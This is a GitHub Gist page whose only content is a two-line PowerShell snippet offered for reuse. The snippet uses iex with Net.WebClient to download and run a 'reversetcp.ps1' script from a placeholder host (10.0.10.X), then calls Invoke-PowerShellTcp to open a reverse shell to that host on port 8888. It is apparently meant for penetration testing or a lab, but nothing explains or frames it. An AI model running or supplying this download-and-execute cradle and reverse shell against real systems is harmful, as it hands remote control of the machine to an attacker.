Skip to content

Instantly share code, notes, and snippets.

@C0axx
Created January 3, 2023 20:38
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save C0axx/ac2ecc0ed536a8fcd985d1ce0d4f4843 to your computer and use it in GitHub Desktop.
Save C0axx/ac2ecc0ed536a8fcd985d1ce0d4f4843 to your computer and use it in GitHub Desktop.
iex (New-Object
Net.Webclient).downloadstring("http://10.0.10.X/reversetcp.ps1")
Invoke-PowerShellTcp -Reverse -IPAddress 10.0.10.X -Port 8888
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment